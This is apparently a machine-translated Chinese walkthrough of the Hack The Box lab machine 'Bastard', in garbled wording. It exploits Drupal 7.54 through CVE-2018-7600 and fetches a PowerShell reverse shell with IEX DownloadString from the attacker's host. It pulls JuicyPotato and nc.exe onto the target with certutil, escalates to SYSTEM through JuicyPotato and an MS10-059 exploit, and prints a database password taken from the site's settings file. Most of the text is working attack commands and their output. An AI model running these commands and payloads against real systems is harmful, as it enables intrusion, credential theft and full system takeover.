免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责
服务探测
rootkali)-[~/htb/Bastard]└─# nmap -sV -Pn -A -O 10.10.10.9 -p- Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-09 22:49 ESTNmap scan report for 10.10.10.9Host is up (0.31s latency).Not shown: 65532 filtered tcp ports (no-response)PORT STATE SERVICE VERSION80/tcp open tcpwrapped| http-robots.txt: 36 disallowed entries (15 shown)| /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt|_http-title: Welcome to 10.10.10.9 | 10.10.10.9|_http-generator: Drupal 7 (http://drupal.org)|_http-server-header: Microsoft-IIS/7.5135/tcp open msrpc?49154/tcp open tcpwrappedWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: specialized|general purpose|phoneRunning (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (89%)OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (89%), Microsoft Windows 8.1 Update 1 (89%), Microsoft Windows Phone 7.5 or 8.0 (89%), Microsoft Windows 7 or Windows Server 2008 R2 (88%), Microsoft Windows Server 2008 (88%), Microsoft Windows Server 2008 R2 (88%), Microsoft Windows Server 2008 R2 or Windows 8.1 (88%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (88%), Microsoft Windows 7 (88%), Microsoft Windows 7 Professional or Windows 8 (88%)No exact OS matches for host (test conditions non-ideal).Network Distance: 3 hopsTRACEROUTE (using port 135/tcp)HOP RTT ADDRESS1 310.73 ms 10.10.14.12 ...3 309.08 ms 10.10.10.9OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2442.65 seconds
web
目录爆破
┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 40 -u http://10.10.10.9 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 40Wordlist size: 15492Output File: /root/dirsearch/reports/10.10.10.9/_22-01-09_22-42-15.txtError Log: /root/dirsearch/logs/errors-22-01-09_22-42-15.logTarget: http://10.10.10.9/[22:42:22] Starting: [22:47:51] 200 - 108KB - /CHANGELOG.txt[22:47:52] 200 - 1KB - /COPYRIGHT.txt[22:47:55] 200 - 108KB - /CHANGELOG.TXT[22:48:02] 200 - 108KB - /ChangeLog.txt[22:48:02] 200 - 108KB - /Changelog.txt[22:49:06] 200 - 18KB - /INSTALL.TXT[22:49:06] 200 - 2KB - /INSTALL.mysql.txt[22:49:07] 200 - 2KB - /INSTALL.pgsql.txt[22:49:08] 200 - 18KB - /INSTALL.txt[22:49:09] 200 - 18KB - /Install.txt[22:49:15] 200 - 9KB - /MAINTAINERS.txt[22:49:18] 200 - 18KB - /LICENSE.txt[22:49:57] 200 - 5KB - /README.TXT[22:49:58] 200 - 5KB - /README.txt[22:50:01] 200 - 5KB - /ReadMe.txt[22:50:01] 200 - 5KB - /Readme.txt[22:51:20] 200 - 10KB - /UPGRADE.txt[23:27:59] 200 - 108KB - /changelog.txt[23:45:19] 301 - 150B - /includes -> http://10.10.10.9/includes/[23:51:45] 200 - 9KB - /maintainers.txt[23:53:37] 403 - 1KB - /members.sql[23:53:58] 301 - 146B - /misc -> http://10.10.10.9/misc/[23:55:02] 301 - 149B - /modules -> http://10.10.10.9/modules/[00:05:25] 301 - 150B - /profiles -> http://10.10.10.9/profiles/[00:05:26] 403 - 1KB - /profiles/standard/standard.info[00:08:06] 200 - 2KB - /robots.txt[00:08:46] 301 - 149B - /scripts -> http://10.10.10.9/scripts/[00:12:28] 301 - 147B - /sites -> http://10.10.10.9/sites/[00:12:30] 200 - 151B - /sites/all/libraries/README.txt[00:12:32] 200 - 1020B - /sites/all/themes/README.txt[00:12:34] 200 - 1KB - /sites/all/modules/README.txt[00:12:35] 200 - 904B - /sites/README.txt[00:16:25] 301 - 146B - /temp -> http://10.10.10.9/temp/[00:17:29] 301 - 148B - /themes -> http://10.10.10.9/themes/[00:19:13] 200 - 10KB - /upgrade.txt Task Completed
80端口web服务关上是一个Drupal站点,在changlog.txt里暴露出了版本号为7.54
kali搜寻这个版本的破绽状况显示存在RCE
┌──(rootkali)-[~/htb/Bastard]└─# searchsploit Drupal 7.54 ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rbDrupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txtDrupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rbDrupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rbDrupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.pyDrupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rbDrupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txtDrupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
在github上找到了这个exp
执行,证实存在RCE
┌──(rootkali)-[~/htb/Bastard]└─# python3 drupa7-CVE-2018-7600.py http://10.10.10.9 -c whoami =============================================================================| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) || by pimps |=============================================================================[*] Poisoning a form and including it in cache.[*] Poisoned form ID: form-4PCW5lyRN9tSvkhtTWc7UK49hDuhBYp1x6H0_7n2a1A[*] Triggering exploit to execute: whoamint authority\iusr
foodhold
筹备好一个Invoke-PowerShellTcp.ps1
脚本
开启一个http服务
┌──(rootkali)-[~]└─# python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
开启监听
nc -lnvp 4242
应用上面payload拿到foodhold
┌──(rootkali)-[~/htb/Bastard]└─# python3 drupa7-CVE-2018-7600.py http://10.10.10.9 -c "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3:8000/Invoke-PowerShellTcp.ps1')"=============================================================================| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) || by pimps |=============================================================================[*] Poisoning a form and including it in cache.[*] Poisoned form ID: form-OVxJXEVi1HyRD_ceKtMc4ArV7CnwvkPS4Fakar_Z8nY[*] Triggering exploit to execute: powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3:8000/Invoke-PowerShellTcp.ps1')
收到反弹shell
┌──(rootkali)-[~/htb/Bastard]└─# nc -lnvp 4242 1 ⨯listening on [any] 4242 ...connect to [10.10.16.3] from (UNKNOWN) [10.10.10.9] 58568Windows PowerShell running as user BASTARD$ on BASTARDCopyright (C) 2015 Microsoft Corporation. All rights reserved.PS C:\inetpub\drupal-7.54>whoamint authority\iusrPS C:\inetpub\drupal-7.54>
在用户dimitris
的桌面拿到user.txt
提权
mysql
在C:\inetpub\drupal-7.54\sites\default\settings.php找到数据库明码
$databases = array ( 'default' => array ( 'default' => array ( 'database' => 'drupal', 'username' => 'root', 'password' => 'mysql123!root', 'host' => 'localhost', 'port' => '', 'driver' => 'mysql', 'prefix' => '', ), ),);
查看网络连接,发现对内开启了mysql
PS C:\inetpub\drupal-7.54>netstat -anoActive Connections Proto Local Address Foreign Address State PID TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:81 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 672 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1060 TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 368 TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 760 TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 804 TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 476 TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 492 TCP 10.10.10.9:80 10.10.16.3:39654 ESTABLISHED 4 TCP 10.10.10.9:139 0.0.0.0:0 LISTENING 4 TCP 10.10.10.9:58568 10.10.16.3:4242 CLOSE_WAIT 2860 TCP 10.10.10.9:58577 10.10.16.3:4242 CLOSE_WAIT 1752 TCP 10.10.10.9:58583 10.10.16.3:4242 CLOSE_WAIT 2804 TCP 10.10.10.9:58605 10.10.16.3:4242 ESTABLISHED 2288 TCP 127.0.0.1:3306 127.0.0.1:58566 ESTABLISHED 1060 TCP 127.0.0.1:3306 127.0.0.1:58575 ESTABLISHED 1060 TCP 127.0.0.1:3306 127.0.0.1:58581 ESTABLISHED 1060 TCP 127.0.0.1:3306 127.0.0.1:58602 ESTABLISHED 1060 TCP 127.0.0.1:58566 127.0.0.1:3306 ESTABLISHED 2628 TCP 127.0.0.1:58575 127.0.0.1:3306 ESTABLISHED 2960 TCP 127.0.0.1:58581 127.0.0.1:3306 ESTABLISHED 2984 TCP 127.0.0.1:58600 127.0.0.1:3306 TIME_WAIT 0 TCP 127.0.0.1:58602 127.0.0.1:3306 ESTABLISHED 2856 TCP [::]:80 [::]:0 LISTENING 4 TCP [::]:81 [::]:0 LISTENING 4 TCP [::]:135 [::]:0 LISTENING 672 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:47001 [::]:0 LISTENING 4 TCP [::]:49152 [::]:0 LISTENING 368 TCP [::]:49153 [::]:0 LISTENING 760 TCP [::]:49154 [::]:0 LISTENING 804 TCP [::]:49155 [::]:0 LISTENING 476 TCP [::]:49156 [::]:0 LISTENING 492 UDP 0.0.0.0:123 *:* 848 UDP 0.0.0.0:5355 *:* 932 UDP 10.10.10.9:137 *:* 4 UDP 10.10.10.9:138 *:* 4 UDP [::]:123 *:* 848
外网无法访问到靶机的mysql服务,传chisel到靶机,转发mysql服务端口
kali端执行
./chisel server -p 8000 --reverse
靶机执行
.\chisel.exe client 10.10.16.3:8000 R:3306:localhost:3306
kali端连贯mysql服务
┌──(rootkali)-[~/htb/Bastard]└─# mysql -h 127.0.0.1 -u root -pEnter password: Welcome to the MariaDB monitor. Commands end with ; or \g.Your MySQL connection id is 29269Server version: 5.5.45 MySQL Community Server (GPL)Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.MySQL [(none)]> show databses;ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'databses' at line 1MySQL [(none)]> show databases;+--------------------+| Database |+--------------------+| information_schema || drupal || mysql || performance_schema || test |+--------------------+5 rows in set (0.808 sec)
在users表找到一个账号密码,另外一个是咱们测试注册写入的账号
MySQL [drupal]> select * from users;+-----+-------+---------------------------------------------------------+----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------+----------+---------+----------------------+------+| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |+-----+-------+---------------------------------------------------------+----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------+----------+---------+----------------------+------+| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL || 1 | admin | $S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE | drupal@hackthebox.gr | | | NULL | 1489920428 | 1492102672 | 1492102672 | 1 | Europe/Athens | | 0 | drupal@hackthebox.gr | b:0; || 5 | max | $S$DnGAoPgTNp7LuoqwmIQjs0m2itKf9bhb/lDoGLHTUjdHjXm..SqN | 1@1.com | | | filtered_html | 1641782294 | 0 | 0 | 0 | Europe/Athens | | 0 | 1@1.com | NULL |+-----+-------+---------------------------------------------------------+----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------+----------+---------+----------------------+------+3 rows in set (0.792 sec)
然而rockyou跑了良久没有方法破解这个hash
提权办法一:烂土豆
查看本账号权限
PS C:\users\dimitris\desktop> whoami /allUSER INFORMATION----------------User Name SID ================= ========nt authority\iusr S-1-5-17GROUP INFORMATION-----------------Group Name Type SID Attributes ==================================== ================ ============ ==================================================Mandatory Label\High Mandatory Level Label S-1-16-12288 Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled groupBUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled groupNT AUTHORITY\SERVICE Well-known group S-1-5-6 Group used for deny only CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled groupNT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled groupNT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled groupLOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled groupPRIVILEGES INFORMATION----------------------Privilege Name Description State ======================= ========================================= =======SeChangeNotifyPrivilege Bypass traverse checking EnabledSeImpersonatePrivilege Impersonate a client after authentication EnabledSeCreateGlobalPrivilege Create global objects Enabled
注意开启了SeImpersonatePrivilege
权限,意味着能够应用烂土豆提权。从github下载烂土豆
下载烂土豆到靶机
certutil -urlcache -split -f http://10.10.16.3:8000/JuicyPotato.exe
下载nc.exe到靶机
certutil -urlcache -split -f http://10.10.16.3:8000/nc.exe
这里会有点绕,我在powershell下无奈胜利执行JuicyPotato.exe,会报这个谬误
PS C:\inetpub\drupal-7.54\temp> .\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\inetpub\drupal-7.54\TEMP\nc.exe -e cmd.exe 10.10.16.3 4444" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}PS C:\inetpub\drupal-7.54\temp> Invoke-PowerShellTcp : Bad numeric constant: 9.At line:117 char:21+ Invoke-PowerShellTcp <<<< -Reverse -IPAddress 10.10.16.3 -Port 4242 + CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorExcep tion + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio n,Invoke-PowerShellTcp
须要反弹一个cmd的shell回kali
靶机
.\nc.exe 10.10.16.3 4444 -e cmd.exe
kali
┌──(rootkali)-[~/htb/Bastard]└─# nc -lnvp 4444 listening on [any] 4444 ...connect to [10.10.16.3] from (UNKNOWN) [10.10.10.9] 58695Microsoft Windows [Version 6.1.7600]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\inetpub\drupal-7.54\temp>whoamiwhoamint authority\iusr
在新的cmd shell下执行上面命令:
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\inetpub\drupal-7.54\TEMP\nc.exe -e cmd.exe 10.10.16.3 4455" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
胜利执行
C:\inetpub\drupal-7.54\temp>JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\inetpub\drupal-7.54\TEMP\nc.exe -e cmd.exe 10.10.16.3 4455" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\inetpub\drupal-7.54\TEMP\nc.exe -e cmd.exe 10.10.16.3 4455" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}Testing {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 1337....[+] authresult 0{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\SYSTEM[+] CreateProcessWithTokenW OK
收到反弹shell
┌──(rootkali)-[~/htb/Bastard]└─# nc -lnvp 4455 1 ⨯listening on [any] 4455 ...connect to [10.10.16.3] from (UNKNOWN) [10.10.10.9] 58688Microsoft Windows [Version 6.1.7600]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoamiwhoamint authority\system
提权办法二:缺失补丁:
systeminfo命令打印零碎信息
PS C:\inetpub\drupal-7.54\temp> systeminfoHost Name: BASTARDOS Name: Microsoft Windows Server 2008 R2 Datacenter OS Version: 6.1.7600 N/A Build 7600OS Manufacturer: Microsoft CorporationOS Configuration: Standalone ServerOS Build Type: Multiprocessor FreeRegistered Owner: Windows UserRegistered Organization: Product ID: 00496-001-0001283-84782Original Install Date: 18/3/2017, 7:04:46 ??System Boot Time: 10/1/2022, 4:08:39 ??System Manufacturer: VMware, Inc.System Model: VMware Virtual PlatformSystem Type: x64-based PCProcessor(s): 2 Processor(s) Installed. [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 MhzBIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018Windows Directory: C:\WindowsSystem Directory: C:\Windows\system32Boot Device: \Device\HarddiskVolume1System Locale: el;GreekInput Locale: en-us;English (United States)Time Zone: (UTC+02:00) Athens, Bucharest, IstanbulTotal Physical Memory: 2.047 MBAvailable Physical Memory: 1.549 MBVirtual Memory: Max Size: 4.095 MBVirtual Memory: Available: 3.587 MBVirtual Memory: In Use: 508 MBPage File Location(s): C:\pagefile.sysDomain: HTBLogon Server: N/AHotfix(s): N/ANetwork Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.9
把下面信息保留到kali端system.info文件
更新Windows-Exploit-Suggester数据库
┌──(rootkali)-[~/Windows-Exploit-Suggester]└─# python windows-exploit-suggester.py --update[*] initiating winsploit version 3.3...[+] writing to file 2022-01-10-mssb.xls[*] done
枚举靶机缺失补丁
┌──(rootkali)-[~/Windows-Exploit-Suggester]└─# python windows-exploit-suggester.py --database 2022-01-10-mssb.xls --systeminfo /root/htb/Bastard/system.info [*] initiating winsploit version 3.3...[*] database file detected as xls or xlsx based on extension[*] attempting to read from the systeminfo input file[+] systeminfo input file read successfully (ascii)[*] querying database file for potential vulnerabilities[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits[*] there are now 197 remaining vulns[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin[+] windows version identified as 'Windows 2008 R2 64-bit'[*] [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC[*] [E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical[*] done
下面补丁一个个枚举当前,锁定MS10-059
下载github上这个提权exp
下载到靶机
certutil -urlcache -split -f http://10.10.16.3:8000/MS10-059.exe
执行反弹shell
PS C:\inetpub\drupal-7.54\temp> .\MS10-059.exe 10.10.16.3 4444
收到反弹shell
┌──(rootkali)-[~/htb/Bastard]└─# nc -lnvp 4444listening on [any] 4444 ...connect to [10.10.16.3] from (UNKNOWN) [10.10.10.9] 58664Microsoft Windows [Version 6.1.7600]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\inetpub\drupal-7.54\temp>whoamiwhoamint authority\system
曾经是system权限